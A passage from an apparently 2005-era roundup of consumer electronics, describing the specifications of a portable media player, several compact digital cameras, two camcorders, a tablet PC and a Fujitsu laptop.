A 4.3" exceptionally bright and clear screen with 262K colours , a 16:9 widescreen format, 30 GB HDD. Still, the list of features found in the PM70 is enough to make anyone interested in portable media viewers take a second look. It will support a Hugh range of video & audio formats, & even supports JPEG & BMP photo formats. It has a FM tuner & also allows FM recording. The PM70 also features the ability to synchronize PIM information with Microsoft Outlook, which is most certainly a feature not present in any current PMC devices except Creative Zen Vision PMP. Topping off such a comprehensive feature set is USB 2.0 connectivity, and a claimed battery life of 16 hours of audio playback or 4 hours of video playback. It will be commercially available some time in the fourth quarter of 2005. Casio Exilim EX-Z500

The Casio Exilim EX-Z500 is a 5 Megapixel camera, with 3x optical zoom with electronic image stabilization. It boasts of a 2.7-inch LCD viewfinder and (what they claim to be, but yet unconfirmed) the ability to snap 500 shots on a single charge. It has a

minimum focusing range of 17 cm. ISO sensitivity from 50 to 800. Offers 31 preset scene modes along with a shutter priority mode. It relies on SD/MMC Cards for storage. Has USB 2.0 connectivity & support for PictBridge. It is available presently in the market, but only in Black colour. Sony Cyber-shot DSC-W7 Digital Camera

This Sony Cyber-shot® DSC-W7 digital camera delivers stunning pictures with 7.2-megapixel resolution. It features a 3x optical zoom & an additional 2x digital zoom. The camera comes with 32MB of internal memory, & has in-built slot for Memory Stick or Memory Stick PRO cards. It runs on 2 AA batteries. It has an enormous 2.5" LCD screen. It comes with Carl Zeiss Vario-Tessar lens. It is PictBridge enabled. Panasonic Lumix DMC-LZ2 Digital Camera

The Panasonic DMC-LZ2 digital camera captures outstanding pictures with 5-megapixel resolution this means you can blow-up your pictures up to sizes as big as 23 cm x 48 cm. It has a superb & yet unbeatable 6x

optical zoom, that is the highest in a camera in the compact cameras segment. It has an additional 4x digital zoom too. It uses the Lumix DC Vario lens, which is made by Lecia & Panasonic. It has a large 2" LCD screen. It features an Optical image stabilizer, the only brand in the world which has that in a compact size camera. So you no longer have to worry about shaky hands blurring a shot—the optical image stabilization system keeps pictures focused. It has a super-fast response called the MegaBurst consecutive shooting, that lets you snap off consecutive shots at 3 frames per second with full resolution. It is PictBridge enabled, so simply connect this camera to any PictBridge enabled printer to print pictures without a PC. Canon PowerShot S2 IS

The Canon PowerShot S2 IS features a 5 megapixel CCD chip for great pictures. It features a 12x optical zoom that lets you get up close to an object before you take. It comes with a 1.8" LCD screen. It has Canon's DIGIC II Image Processor which is designed to improve processing speed and image quality. It has Canon’s iSAPS Technology which works with the fast DIGIC II Image Processor to improve focus speed and accuracy, as well as exposure and white balance.

Panasonic Lumix® DMC-FZ5 Digital Camera

The Panasonic DMC-FZ5 digital camera captures outstandingly sharp & clear pictures with its 5-megapixel CCD. You get superb picture quality with either the 6”x 4” or the full blow-up of up to sizes as big as 23 cm x 48 cm. It has a superb & yet sharp 12x optical zoom, & an additional 4x digital zoom. It uses the extremely high quality & popular Leica DC Vario lens. It has a large 1.8" LCD screen. It features an Optical image stabilizer technology called “MEGA O.I.S.”, which takes care of all the shaky hands blurring a shot by keeping the pictures focused. It has a super-fast response called the MegaBurst consecutive shooting, that lets you snap off consecutive shots at 3 frames per second with full resolution. It uses SD card & MultiMediaCard for storage. It is PictBridge enabled, so simply connect this camera to any PictBridge enabled printer to print pictures without a PC. You can even connect it to the TV, & watch the pictures as a slide show. Another plus point of the camera is it has the ability to take pictures in f2.8 throughout the entire zoom range. It is lighter & more professional looking & quieter than any other camera in the class or in the budget range. It is better than the Sony H1, Canon S1 IS & S2 IS, Kodak 7590, or the Olympus C-770, so if you are thinking of buying any of these cameras have a look at Panasonic FZ5 before you decide.

JVC Everio GZ-MC500E

Here is one of the first series of hard drive based camcorders, the JVC Everio GZ-MC500E & it has the ability to compete head-to-head with tape based competitors. Its exterior is a tad more unusual than most cameras, & the entire camera body can rotate up to 45 degrees in either up or down along the vertical axis of the lens. It is very compact & light weight. It features a 10x optical zoom lens (8x for still images) with three separate 1/4.5-inch, 1.33 Megapixel CCD chips (it is a 3CCD camera). It has a SD Card and CompactFlash Type II expansion slots, with the latter by default occupied by a 4 GB MicroDrive. This allows for hassle-free expansion and broad compatibility with media readers and laptops everywhere. It has an integrated USB 2.0 connectivity port for a much easier way to transfer data. Additionally, PictBridge and DPOF support are available for direct-to-printer output. It has a 1.8-inch LCD screen. Audio can be recorded in 16-bit dual channel Dolby Digital format at 48 kHz and a bit rate of 1.536 Kbps. It is immediately available in Europe & North America.

Panasonic Camcorder NV-GS35

The Panasonic NV-GS35 is a excellent camera in the single CCD range of cameras, & it is the only one with a Humongous 30x Optical Zoom, & 1000x Digital Zoom. It has 2.5” LCD screen. It comes with 2 remotes one wired & basic for recording, taking snaps, & zooming, & the other a fully functional Infra-red remote. It has a colour viewfinder, direct mode Dial for easier use, a in-built video light. It has super image stabilizer (electronic stabilizer); Zoom Mike, which lets you pick distant sounds; a special Wind Cut feature which contributes to reducing wind noise; Colour Night View; Quick starts in 1.7 secs; can be used as a Web-cam. It has an integrated SD card/ MMC card slot for storing pictures. It has a really cool feature called the “Simultaneous Motion Video & Still Picture Recording” which lets you to record videos in tape & at the same time take snaps which are stored in the SD/MMC card, without delaying or affecting one another. It has an USB 2.0 port, for transferring video & still data from the camera to the PC, it even has the USB streaming option which lets u to transfer video to the PC at the speed of 480 Mbps. It is the best camera in the price range & features range.

Motion Computing LS800 Tablet PC

We all know Tablet PCs aren’t selling all that fantastically well these days, but if a convertible just isn’t for you, or maybe you’re looking for something a little smaller, you might want to peep Motion Computing’s LS800 8.4-inch tablet device. The device is a svelte 2.2-pounds and is only about 8.9 x 6.7 x 0.9-inches. It is equipped with a 1.2GHz Pentium M ULV CPU, integrated WiFi, Bluetooth, biometric print reader, two USB ports, and an SD slot. Fujitsu LifeBook N6200

Fujitsu LifeBook N6200 is a really cool laptop, which qualifies to be a full-size desktop replacement packing Pentium M, a 17-inch WXGA TFT LCD, ATI Mobility Radeon X600 graphics with 128 MB video memory, 802.11a/b/g and Gigabit Ethernet, Memory Stick/SD/xD card slots, and 3D Dolby audio with subwoofer. Tooled for gamers and multimedia producers/consumers, it’ll come in configurations up to 2GB DDR2 RAM and your choice of a slower 200GB or faster (7200 rpm) 60GB internal drive.